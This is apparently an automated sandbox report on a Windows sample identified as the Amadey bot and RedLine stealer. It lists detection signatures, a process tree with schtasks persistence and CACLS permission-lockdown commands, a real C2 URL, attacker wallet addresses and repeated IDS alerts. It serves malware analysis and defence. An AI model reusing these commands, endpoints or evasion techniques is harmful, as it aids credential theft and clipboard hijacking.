Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 799672
MD5: 3ac20281c213c418608fcea6d744ae8f
SHA1: 694ee56f317c410cce4bb0dec9b1d6b6f4059f48
SHA256: f33d6a14fc683aa41846e4073347b71810d835e5f7695dd834b98007826ec831
Tags: exe

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadey's Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 1880 cmdline: C:\Users\user\Desktop\file.exe MD5: 3AC20281C213C418608FCEA6D744AE8F)
    • brJg.exe (PID: 2296 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exe MD5: E61222B4D82A6007A553851456BCC651)
      • arJf.exe (PID: 6080 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exe MD5: 01BC3DF99AB67BABCDC1577241E3EE87)
      • nika.exe (PID: 6128 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 3184 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 2728 cmdline: "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 5816 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 3824 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 604 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 2664 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 2880 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4884 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 5064 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 1124 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 2192 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 3484 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1428 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 3008 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5360 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4800 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4552 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
0000001C.00000002.412655905.0000000000071000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000001A.00000000.401919368.0000000000071000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
00000021.00000002.667787109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
28.2.mnolyk.exe.70000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
26.2.mnolyk.exe.70000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
31.0.mnolyk.exe.70000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
28.0.mnolyk.exe.70000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0.3.file.exe.4a09a20.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

No Sigma rule has matched
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450282802027700 02/06/23-18:38:28.628161
                              SID:2027700
                              Source Port:50282
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449995802027700 02/06/23-18:37:11.226045
                              SID:2027700
                              Source Port:49995
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450111802027700 02/06/23-18:37:42.623221
                              SID:2027700
                              Source Port:50111
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449824802027700 02/06/23-18:36:23.412568
                              SID:2027700
                              Source Port:49824
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449741802027700 02/06/23-18:36:01.744620
                              SID:2027700
                              Source Port:49741
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449954802027700 02/06/23-18:37:00.821017
                              SID:2027700
                              Source Port:49954
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450337802027700 02/06/23-18:38:41.721828
                              SID:2027700
                              Source Port:50337
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450046802027700 02/06/23-18:37:25.862441
                              SID:2027700
                              Source Port:50046
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449759802027700 02/06/23-18:36:06.092268
                              SID:2027700
                              Source Port:49759
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450360802027700 02/06/23-18:38:49.288881
                              SID:2027700
                              Source Port:50360
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449889802027700 02/06/23-18:36:40.164302
                              SID:2027700
                              Source Port:49889
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450005802027700 02/06/23-18:37:15.731218
                              SID:2027700
                              Source Port:50005
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450259802027700 02/06/23-18:38:21.378414
                              SID:2027700
                              Source Port:50259
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450087802027700 02/06/23-18:37:36.937901
                              SID:2027700
                              Source Port:50087
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450124802027700 02/06/23-18:37:45.767098
                              SID:2027700
                              Source Port:50124
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450026802027700 02/06/23-18:37:21.007243
                              SID:2027700
                              Source Port:50026
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449982802027700 02/06/23-18:37:07.790106
                              SID:2027700
                              Source Port:49982
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449988802027700 02/06/23-18:37:09.232773
                              SID:2027700
                              Source Port:49988
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450255802027700 02/06/23-18:38:20.425505
                              SID:2027700
                              Source Port:50255
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449921802027700 02/06/23-18:36:50.850422
                              SID:2027700
                              Source Port:49921
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449734802027700 02/06/23-18:36:00.024734
                              SID:2027700
                              Source Port:49734
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450001802027700 02/06/23-18:37:14.735617
                              SID:2027700
                              Source Port:50001
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450157802027700 02/06/23-18:37:55.206071
                              SID:2027700
                              Source Port:50157
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450353802027700 02/06/23-18:38:47.570344
                              SID:2027700
                              Source Port:50353
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449725802027700 02/06/23-18:35:56.007022
                              SID:2027700
                              Source Port:49725
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449823802027700 02/06/23-18:36:23.177069
                              SID:2027700
                              Source Port:49823
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449979802027700 02/06/23-18:37:06.951379
                              SID:2027700
                              Source Port:49979
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449790802027700 02/06/23-18:36:13.365591
                              SID:2027700
                              Source Port:49790
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449832802027700 02/06/23-18:36:25.351769
                              SID:2027700
                              Source Port:49832
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450344802027700 02/06/23-18:38:44.257733
                              SID:2027700
                              Source Port:50344
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450246802027700 02/06/23-18:38:18.266167
                              SID:2027700
                              Source Port:50246
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450184802027700 02/06/23-18:38:01.659964
                              SID:2027700
                              Source Port:50184
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450143802027700 02/06/23-18:37:51.857942
                              SID:2027700
                              Source Port:50143
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449781802027700 02/06/23-18:36:11.243044
                              SID:2027700
                              Source Port:49781
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450095802027700 02/06/23-18:37:38.824933
                              SID:2027700
                              Source Port:50095
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449963802027700 02/06/23-18:37:03.026261
                              SID:2027700
                              Source Port:49963
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449893802027700 02/06/23-18:36:41.133872
                              SID:2027700
                              Source Port:49893
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449922802027700 02/06/23-18:36:51.089881
                              SID:2027700
                              Source Port:49922
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450115802027700 02/06/23-18:37:43.614292
                              SID:2027700
                              Source Port:50115
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450185802027700 02/06/23-18:38:01.897079
                              SID:2027700
                              Source Port:50185
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449851802027700 02/06/23-18:36:29.678141
                              SID:2027700
                              Source Port:49851
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449804802027700 02/06/23-18:36:18.533346
                              SID:2027700
                              Source Port:49804
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449762802027700 02/06/23-18:36:06.819557
                              SID:2027700
                              Source Port:49762
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450227802027700 02/06/23-18:38:13.624631
                              SID:2027700
                              Source Port:50227
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450061802027700 02/06/23-18:37:29.246156
                              SID:2027700
                              Source Port:50061
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450316802027700 02/06/23-18:38:36.846930
                              SID:2027700
                              Source Port:50316
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450020802027700 02/06/23-18:37:19.544837
                              SID:2027700
                              Source Port:50020
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450274802027700 02/06/23-18:38:25.337791
                              SID:2027700
                              Source Port:50274
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450070802027700 02/06/23-18:37:32.801483
                              SID:2027700
                              Source Port:50070
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449794802027700 02/06/23-18:36:14.301275
                              SID:2027700
                              Source Port:49794
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449938802027700 02/06/23-18:36:57.008660
                              SID:2027700
                              Source Port:49938
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450073802027700 02/06/23-18:37:33.536848
                              SID:2027700
                              Source Port:50073
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450058802027700 02/06/23-18:37:28.499164
                              SID:2027700
                              Source Port:50058
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450156802027700 02/06/23-18:37:54.967951
                              SID:2027700
                              Source Port:50156
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450067802027700 02/06/23-18:37:31.325633
                              SID:2027700
                              Source Port:50067
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449880802027700 02/06/23-18:36:37.960430
                              SID:2027700
                              Source Port:49880
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449950802027700 02/06/23-18:36:59.857429
                              SID:2027700
                              Source Port:49950
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449766802027700 02/06/23-18:36:07.787301
                              SID:2027700
                              Source Port:49766
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450128802027700 02/06/23-18:37:46.748438
                              SID:2027700
                              Source Port:50128
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449864802027700 02/06/23-18:36:32.756228
                              SID:2027700
                              Source Port:49864
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449775802027700 02/06/23-18:36:09.999214
                              SID:2027700
                              Source Port:49775
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450214802027700 02/06/23-18:38:10.502845
                              SID:2027700
                              Source Port:50214
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449849802027700 02/06/23-18:36:29.177906
                              SID:2027700
                              Source Port:49849
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449947802027700 02/06/23-18:36:59.148434
                              SID:2027700
                              Source Port:49947
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450042802027700 02/06/23-18:37:24.857893
                              SID:2027700
                              Source Port:50042
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450140802027700 02/06/23-18:37:51.157275
                              SID:2027700
                              Source Port:50140
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450296802027700 02/06/23-18:38:31.975155
                              SID:2027700
                              Source Port:50296
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450131802027700 02/06/23-18:37:47.485008
                              SID:2027700
                              Source Port:50131
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450312802027700 02/06/23-18:38:35.876032
                              SID:2027700
                              Source Port:50312
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450303802027700 02/06/23-18:38:33.662984
                              SID:2027700
                              Source Port:50303
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450086802027700 02/06/23-18:37:36.704777
                              SID:2027700
                              Source Port:50086
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449919802027700 02/06/23-18:36:50.383743
                              SID:2027700
                              Source Port:49919
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450299802027700 02/06/23-18:38:32.713859
                              SID:2027700
                              Source Port:50299
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450045802027700 02/06/23-18:37:25.620164
                              SID:2027700
                              Source Port:50045
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450169802027700 02/06/23-18:37:58.055436
                              SID:2027700
                              Source Port:50169
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449991802027700 02/06/23-18:37:09.959911
                              SID:2027700
                              Source Port:49991
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450039802027700 02/06/23-18:37:24.123203
                              SID:2027700
                              Source Port:50039
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450017802027700 02/06/23-18:37:18.799281
                              SID:2027700
                              Source Port:50017
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450366802027700 02/06/23-18:38:50.739823
                              SID:2027700
                              Source Port:50366
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450320802027700 02/06/23-18:38:37.801532
                              SID:2027700
                              Source Port:50320
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449786802027700 02/06/23-18:36:12.426489
                              SID:2027700
                              Source Port:49786
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450231802027700 02/06/23-18:38:14.609316
                              SID:2027700
                              Source Port:50231
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450308802027700 02/06/23-18:38:34.900026
                              SID:2027700
                              Source Port:50308
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450160802027700 02/06/23-18:37:55.923634
                              SID:2027700
                              Source Port:50160
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449992802027700 02/06/23-18:37:10.200128
                              SID:2027700
                              Source Port:49992
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450053802027700 02/06/23-18:37:27.528345
                              SID:2027700
                              Source Port:50053
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449829802027700 02/06/23-18:36:24.582432
                              SID:2027700
                              Source Port:49829
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450219802027700 02/06/23-18:38:11.691917
                              SID:2027700
                              Source Port:50219
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450071802027700 02/06/23-18:37:33.042572
                              SID:2027700
                              Source Port:50071
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449918802027700 02/06/23-18:36:50.149978
                              SID:2027700
                              Source Port:49918
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449930802027700 02/06/23-18:36:55.312009
                              SID:2027700
                              Source Port:49930
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450059802027700 02/06/23-18:37:28.737026
                              SID:2027700
                              Source Port:50059
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450237802027700 02/06/23-18:38:16.048099
                              SID:2027700
                              Source Port:50237
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449841802027700 02/06/23-18:36:27.522197
                              SID:2027700
                              Source Port:49841
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450148802027700 02/06/23-18:37:53.070956
                              SID:2027700
                              Source Port:50148
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450025802027700 02/06/23-18:37:20.761388
                              SID:2027700
                              Source Port:50025
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449974802027700 02/06/23-18:37:05.733543
                              SID:2027700
                              Source Port:49974
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450310802027700 02/06/23-18:38:35.397050
                              SID:2027700
                              Source Port:50310
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
